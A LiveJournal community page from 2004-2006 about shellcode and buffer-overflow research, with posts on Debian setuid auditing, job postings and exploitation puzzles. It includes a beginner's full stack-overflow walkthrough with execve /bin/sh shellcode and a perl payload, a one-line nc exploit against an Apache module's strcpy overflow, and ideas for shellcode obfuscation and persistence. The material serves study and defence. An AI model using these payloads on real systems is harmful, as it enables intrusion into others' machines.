Shellcode development / Overflow coding community's Journal
[Most Recent Entries]
[Calendar View]
[Friends]
Below are the 20 most recent journal entries recorded in
Shellcode development / Overflow coding community's LiveJournal:
[ << Previous 20 ]
| Saturday, August 19th, 2006 | 6:32 pm
[skx]
 |
W00t
Shellcode.org got a plug in an excellent article explaining How Shellcode Work.
I guess I expected to do more with the domain when I set it up, but at the end of the day there are only so many things you want to do with shellcode - and exec("/bin/sh"); covers 95% of cases.
![[info]](http://p-stat.livejournal.com/img/community.gif) crossposted to shellcode | | Friday, June 2nd, 2006 | 7:35 pm
[transgress]
 |
Job Posting - Security Researcher
Below you will find a rather vague job opening, to fill in some of the details. The position is within a public sector organization (read: US Govt) as part of an incident response team. This position is located in North Las Vegas, NV and requires 20-50% travel.
The focus of the position is on analysis of malicious software and exploits. This means that despite what the posting says, knowledge of Intel architecture assembly is mandatory, experience with actual reverse engineering is nice but not necessary. Ability to perform forward engineering is mandatory as well, C or C++ preferred. Platform is not an issue, while most work involves Windows and the Win32 API, one can swing either way. A person who is at least aware of the ISO C and ISO C++ standards with the ability to program at least decently in POSIX environment and Win32 is preferred and will be given preference. Degree's are nice, but not necessary- the self-taught who are proficient are given preference. This is not a summer part time job, this is a full time position. Please contact me if you have any further questions.
Job Description:
This position is required for a diverse and growing incident management
environment. The individual will be responsible for responding to a wide
range of requests for examination of suspected malware. The preferred
candidate will be responsible for debugging, analyzing and documenting
findings of suspected malware and exploits. The candidate will also be
required to work in a team environment and foster communication and
provide concise input to the other organizations.
Required Skills:
The candidate will possess a strong security background with knowledge in
the following areas: diverse operating systems, networking protocols and
concepts as well as programming including high and low level languages.
Knowledge of x86 assembly language is also preferred. This individual
should possess good communications skills targeted at the technical and
business communities. A demonstrated ability to communicate verbally as
well as in writing is required.
Further Requirements:
Must be a US citizen
Must be able to obtain a high level security clearance | | Friday, December 23rd, 2005 | 4:33 pm
[skx]
 |
| | Saturday, December 17th, 2005 | 9:40 pm
[transgress]
|
a question
So I've recently found myself in the position of needing to help with the creation of a new position where I am employed (no i dont want to hire you).
The position is basically in incident response, with a tinge of forensics analysis. The position is essentially that of a first responder with a strong tie to doing post-mortem analysis, the skillset required is strongly technical (ie reverse engineering ability (i.e. assembly programming experience), tool development (c/c++), exploit identification and analysis/etc). But I can't come up with a good title for the position, the current suggestion is 'forensics analyst', however I do not feel that adequately describes the position- I don't need a FTK/Encase jockey, I basically need someone with strong exploit development/analysis and malware analysis experience, focused at incident response.
suggestions? | | Monday, October 10th, 2005 | 1:09 am
[skx]
 |
get_esp()
I'm sure we've all seen this function before:
unsigned long get_esp(void)
{
__asm__("movl %esp,%eax");
}
It works, but it has the side-effect of generating an irritating compiler warning:
foo.c: In function `get_esp':
foo.c:99: warning: control reaches end of non-void function
I've just come across a novel approach to to solving this problem and I figured I'll share.
/* A way to get the ESP without using assembly instructions */
int get_esp = (int)&get_esp;
Stick it at the end of any local variables and it'll do the job. I can't decide if I like it or not, but it does fix my compiler warnings...
| | Saturday, October 8th, 2005 | 11:53 am
[coltseavers] |
Buffer overflow tutorial for beginner Hi all, I am new to this forum and totally new to buffer overflows, so please bear with me. I am trying to understand how buffer overflows work and I think I am really that close to succeeding but there is still something missing because I can't get a shell. So here's what I have done so far, maybe you can spot my mistake: 1. Created a vulnerable C program $ cat gameover.c #include [ Error: Irreparable invalid markup ('<stdio.h>') in entry. Owner must fix manually. Raw contents below.] Hi all,
I am new to this forum and totally new to buffer overflows, so please bear with me. I am trying to
understand how buffer overflows work and I think I am really that close to succeeding
but there is still something missing because I can't get a shell.
So here's what I have done so far, maybe you can spot my mistake:
1. Created a vulnerable C program
$ cat gameover.c
#include <stdio.h>
int echo() {
char buf[200];
gets(buf);
puts(buf);
}
int main() {
printf("Please enter a string:");
echo();
return 0;
}
2. Compiled the software and got the return address for buf:
$ ls
gameover gameover.c
$ gcc -g gameover.c -o gameover
/tmp/ccKSgDEi.o(.text+0x13): In function `echo':
/home/mssf1/gameover.c:7: warning: the `gets' function is dangerous and should
not be used.
$ ls -la gameover*
-rwxr-xr-x 1 myuser myuser 17164 Oct 8 01:25 gameover
-rw-r--r-- 1 myuser myuser 169 Oct 8 00:55 gameover.c
$ gdb gameover
GNU gdb 6.3-debian
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-linux"...Using host libthread_db library
"/lib/libthread_db.so.1".
(gdb) break echo
Breakpoint 1 at 0x80483fd: file gameover.c, line 7.
(gdb) run
Starting program: /home/mssf1/gameover
Breakpoint 1, echo () at gameover.c:7
7 gets(buf);
(gdb) next
Please enter a string:textstring
8 puts(buf);
(gdb) print &buf
$1 = (char (*)[200]) 0xbffffcf0
(gdb) quit
So I have the address for buf, and that's 0xbffffcf0. As several runs have
confirmed, this address is not changing each time I ran the program so it is
a constant value. Great.
3. Getting the number of characters to overflow EBP and EIP:
$ perl -e 'print "A"x212' | ./gameover
Please enter a string:AAAAAAAA etc
$ perl -e 'print "A"x216' | ./gameover
Please enter a string:AAAAAAAA etc
Illegal instruction
$ gdb gameover
GNU gdb 6.3-debian
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-linux"...Using host libthread_db library
"/lib/libthread_db.so.1".
(gdb) run
Starting program: /home/mssf1/gameover
Please enter a string:AAAAAAAAAAA (212 times)
Program exited normally.
(gdb) run
Starting program: /home/mssf1/gameover
Please enter a string:AAAAAAAAAAAAAAAA (216 times)
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) info registers
eax 0x0 0
ecx 0x40018000 1073840128
edx 0x0 0
ebx 0x4014a880 1075095680
esp 0xbffffd08 0xbffffd08
ebp 0x41414141 0x41414141
esi 0x40016540 1073833280
edi 0xbffffe34 -1073742284
eip 0x41414141 0x41414141
eflags 0x286 646
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x0 0
(gdb) quit
Alright so now I know the number of characters to overflow these two registers.
4. Get a shell code and construct the attack
I will try to create my own shellcode next time but this time I downloaded one
from shellcode.org (Aleph's code):
\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh
This is 45 bytes long, ok. So I then have 216-45=171 bytes left for the return
address and the nops. I then calculated 20 x 4 bytes for the return address
and the rest for the nops and finally I get:
91 x 1 byte nop instruction (91 times)
45 x 1 bytes: shellcode
20 x 4 bytes: return address (20 times)
5. Execute attack
$ perl -e 'print "\x90"x91 .
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh" .
"\x0f\xcf\xff\xfb"x20' | ./gameover
Please enter a string:ë^1ÀFF
°
óV
Í1ÛØ@ÍèÜÿÿÿ/bin/shÏÿûÏÿûÏÿûÏÿûÏÿûÏÿûÏÿûÏÿûÏÿûÏÿûÏÿûÏÿûÏÿûÏÿûÏÿûÏÿûÏÿûÏÿûÏÿûÏÿû
Illegal instruction
Why does this not work? Where is my mistake here? Thank you very very much.
Get the good work up!
Best regards,
Colt | | Saturday, May 21st, 2005 | 6:26 pm
[skx]
|
Interested?
Nothing much been happening here in shellcode since my last post a few months ago.
Doesn't anybody have any interesting questions? snippets of code?
I was thinking of posting a challenge again - would that be useful?
What I've been doing
For the past few weeks I've been creating DOS attacks against web browsers - constructing bogus HTML pages which make browsers lock / crash.
A good example is this one:
Minority browsers, such as Dillo, seem remarkably easy to crash or lockup. Unfortunately most of my reports have been ignored..
Meta
![[info]](http://p-stat.livejournal.com/img/userinfo.gif) andiblue / hughe you might want to update the community info - since I'm not maintaining it at the moment...
| | Wednesday, December 1st, 2004 | 3:40 pm
[skx]
|
Community handover
due to my planned departure from Livejournal land I'll no longer be maintaining this community. (Not that it needed any thus far anyway).
Instead hughe is now in charge - ph34r him! (andiblue is a secondary)
hughe is another Edinburgh local, and one of the two people who motivated me enough to create this community in the first place. He and figg shared many a rambling chat over a pint or two at a local pub (theauldhooose).
As the place has been a bit quiet for the past while here's one last teaser:
Leaving Challenge
If a program allows you to overwrite four bytes whilst it's running you can leverage this to run shellcode.
Three bytes is doable too, generaly.
Ditto for two bytes, if you get lucky.
Show with an example a program which can be exploited by writing one byte to it's address/dataspace
That actually kept me going for a few hours last month :)
| | Wednesday, September 15th, 2004 | 1:21 am
[hohf]
 |
| | Thursday, September 9th, 2004 | 12:05 am
[skx]
|
Sample Code Then
Explain the flaw, write an exploit.
Or look and mock .. one of the two.
Questions or feedback welcome - I admit this isn't original code, so if you search google carefully you'll find a worked solution and discussion, but you'll fail your exam ;)
( Cut for length ) Current Mood: anticipatory | | Friday, September 3rd, 2004 | 1:42 pm
[skx]
|
Shellcode
I've not been doing much auditing recently, and I've not played with shellcode stuff for a while
so this is just a post to keep the community alive.
I guess when this was started there were a few local people who wanted to do some small amounts of
playing - but once you've seen how one buffer overflow works it's very hard to become excited over
another near-identical one.
Which leads to the question - is this a useful community?
Is there anything which would be useful to post here?
Anything you don't understand, or would like to see a worked example of?
Good news
I uploaded a new version of GCC with the SSP support enabled to this apt-get repository.
I have a Sun Netra for playing with non-intel exploitation.
When Sarge is released (soon ?) then I will restart looking at code properly.
Somehow we seem to have lots of members / watchers of the community. I wonder where they sprang from?
Best news
Some very interesting members here.
Searching google for shellcode lists this community as number ten hit, number one hit is shellcode.org.
| | Tuesday, May 25th, 2004 | 7:25 pm
[transgress]
|
hi. just ran across the community. thought id say hi and post something i found interesting recently in an unamed piece of software. (im working from memory here so snippets could be wrong)
while (str[int] != '\r' || str[int] != '\n') {
str[int--] = 0;
}
at first i thought to myself, geez, i cant overflow the actual str itself (on the stack), writen to by a routine that writes strlen(str-1), what I can control is whether \n or \r's exist, but the problem is that its defined like
void some_function(args) {
char str[SIZE];
int other_vars;
...
So, there is really nothing I can overwrite, besides the calling stack frame, and even then I can only overwrite it with 0's. Which reminded me of a bug a friend found a bit back in ssh, where you could overwrite with 0's, not much good- but he was in the heap, where a zero has a bit more importance, none the less he never succeeded in getting a user controlled chunk in the right spots and it was later disclosed on a mailing list somewhere as 'findings of the underground' or something- back to my point, what good is this? if i overwrite a bunch i will crash because of us trying to return to 0x00000000 right? well. What if the function is called recursivley and we can control the ammount of times it will get called, and we can make the second lsb of the saved frame pointer equal \n or \r, well .. i suppose it could happen, but thats alot of recursion we are talking about- still i found it interesting to think about. then it occured to me, we were growing backwards, i.e. int-- so we are actually growing up towards lower memory addresses, and other vars- which ends up causing a buffer to be misized and thus overflowed, yey. Now, I really don't believe in full disclosure, or disclosure at all- i really dont think I should be doing the work for other people, plus i kinda like my bugs thus I havent told any of you what program this is in, and I didn't bring it up as an advisory type thing, i just brought it up because i found it interesting the idea of having a special address (i.e. saved frame ptr, or ret address or whatever), equal up to what the code was searching for. To kill some of the paranoia, i will tell you this is not a program you would should find on your work servers, but most of you would find on your home boxes, and us types being social creatures, most of us use it. anyways, hi- just found the community. how are you? | | Wednesday, May 26th, 2004 | 2:53 am
[yaarg]
 |
Shellcode fun... Thought I would just point out that Pull the Plug is back online..... Current Mood:  sleepy | | Wednesday, May 19th, 2004 | 8:29 am
[skx]
|
Just a small mention of Glib / Gtk Misc GLib
I was tracing through some Gtk games the other night and I came
across some code which looked like this:
char filePath[1024];
sprintf( "%s/foo", g_get_tmp_dir() );
Looking over this I remembered I'd seen it before so I'll post this
here as a reminder:
| GLib Function | Internals |
| g_get_tmp_dir | getenv("TMPDIR") || getenv("TMP") || "/tmp" |
| g_get_home_dir | getenv("HOME"); |
(This code can be seen in gutils.c - part of the package libglib1.2-dev).
Worth remembering these functions can be set to return arbitary strings ..
| | Saturday, May 8th, 2004 | 1:59 pm
[skx]
|
Apache modules ... Apache Modules
Whilst looking at some old code of mine for throttling access to files in Apache I came across mention of mod_simultaneous.c.
This contains a classic buffer overflow:
static int get_lockfile_for_request(request_rec *r, char **namep)
{
int lock_file;
static char lock_file_name[256];
char *cp;
if(namep)
*namep = lock_file_name;
if(r->filename && *r->filename) {
#if DEBUG
fprintf(stderr, "file to lock '%s'\n", r->filename);
#endif
}
else {
return (-1);
}
strcpy(lock_file_name, r-&qt;filename);
...
}
This is one of two exploitable issues with the code. (The other in get_access).
There's not too much to confuse there, r->filename comes from the request made by the client browser...
Thankfully (sadly?) it's no longer distributed with Apache so it's not a big deal - I'm just posting this here to remind myself that it's worth looking over modules in the future.
Exploitation is trivial, using a slightly modified version of my generic command line overflow tool - (I just changed the shellcode to do something other than run a shell) - run something like this:
cmd-overflow --size=2048 --target=/bin/echo --args='GET /% HTTP/1.0' | nc hostname 80
| | Wednesday, May 5th, 2004 | 10:05 am
[skx]
|
Audits
It looks like the auditing work I've been doing is going to become official shortly.
I'm now listed on the Debian Organizational Structure.
Shellcode
I spent a while last night playign with some port binding shellcode - nothing terribly new or interesting.
But it did make me wonder if there are more interesting things I could be doing, most of the shellcode I've seen does:
- Runs a shell
- Binds a shell to a port
- Touches a file in /etc
What else can we do that's more interesting?
I guess with writing to a file you get arbitary freedom - anything from creating preload hacks, to adding system wide cronjobs.
Maybe we should hold a challenge .. suggest something and see if it gets written!
| | Wednesday, April 21st, 2004 | 10:00 pm
[skx]
|
Old-school asm... The Goal
I was re-reading the Jon North pieces recently called 'How To Hack'.
These are some old school pieces on how to dissasemble z80 machine code, geared around hacking ZX Spectrum games to gain infinite lives.
One of the pieces discussed the (in)famous "Speedlock" series of protection.
These were souped up tape loading routines which were used to load games from tape, and they were a complete pain to reverse engineer.
Some of the later ones were quite simple seeming on the surface, each one would look like this:
;; Decryption routine which transforms gibberish
;; located at "code" into valid instructions.
;; does this by saying:
;; poke( hl ), ( (peek(hl) - 1 )
;; for 'length' times.
LD DE, length
LD HL, code
loop:
DEC(HL)
LD A,D
INC HL
OR E
JNZ loop
code:
There is only one important thing to notice here, the code starts off
by decrypting itself, then when that is done it falls off the end into
the new code.
(ie when the loop finishes the code from the lable 'code' to the end
of the program is decrypted and suddenly becomes valide instructions).
Great you think, that's easy to handle, right?
Wrong. Imagine instead of that decryption routine five or six different
ones strung together end on end on end say 150 times... *ouch*.
I'm going to stop talking about this now - but for reference you can see a writeup of this online here.
Whilst re-reading this piece I thought to myself this would be fun to code in x86 assembly as a means of obfuscating shellcode.
Granted if you write a couple of different decryption routines and then repeatedly chain them end-on-end you're going to end up with *large* shellcode, but as an academic excercise it's fun.
Starting out
First choose your shellcode.
( using 'as' and 'ld' )
Going further
Now write a decryption routine or two.
( Now you can chain this with itself lots .. )
What next?
To complete the job we should write a small C program to chain
a few of these encryption routines together.
If I anybody is interested I might post one later.
| | Sunday, April 4th, 2004 | 2:53 pm
[skx]
|
setuid text editor?
One of the most suprising things that I spotted when looking over the setuid lists of the Debian was the existance of a setuid text editor.
This immediately struck me as being just wrong.
Last August I reported a couple of exploitable bugs with it, and today an update was released.
Thankfully it's not setuid any more.
My original bug report, and the resulting advisory.
In the intervening nine months between me reporting it publically and it being closed it was spotted by Jaguar also.
My next post will have real assembler and everything ;) | 1:23 am
[skx]
|
Minor updates SSP
I've released an updated version of the SSP enabled compiler suite for Debian unstable, following the recent update.
To use this add the following to your /etc/apt/sources.list:
#
# SSP Enabled Compiler
#
deb http://people.debian.org/~skx/apt/unstable ./
deb-src http://people.debian.org/~skx/apt/unstable ./
Website
I've also updated the Shellcode website - to include a new mailing list debian-audit to cover anything that people wish to discuss about the auditing process.
| | Wednesday, March 31st, 2004 | 8:15 am
[skx]
|
setuid / setgid file lists.
A while back I put together a list of setuid/setgid files included in Debian.
Whilst it's not an exhaustive list it was an interesting thing to look at when starting auditing.
I'm in the process of putting online a similar list for SCO Openserver, and Solaris.
Whilst I'm on the point of doing this I wondered if more people would share their lists, Redhat, Gentoo, etc.
If you have access to such a system would you consider commenting with your list?
If so, become root and run:
# Find setuid
find / -perm 4755 -exec ls -l \{\} \; | tee setuid.log
# Find setgid
find / -perm 2755 -exec ls -l \{\} \; | tee setgid.log
(You must be root to do this, so that you permission to enter all directories. Running just on /bin, /sbin, /etc and /usr/local would probably suffice in most cases).
Update: running 'uname' and including the output would be useful too! |
[ << Previous 20 ]
|
|
|
